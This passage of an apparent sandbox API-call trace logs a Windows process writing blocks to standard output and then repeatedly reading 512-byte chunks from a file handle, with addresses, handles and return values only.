lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, 
lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.953] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.953] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 
[0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, 
lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, 
lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: 
lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, 
lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.957] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.958] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.966] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.967] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 
[0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.968] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, 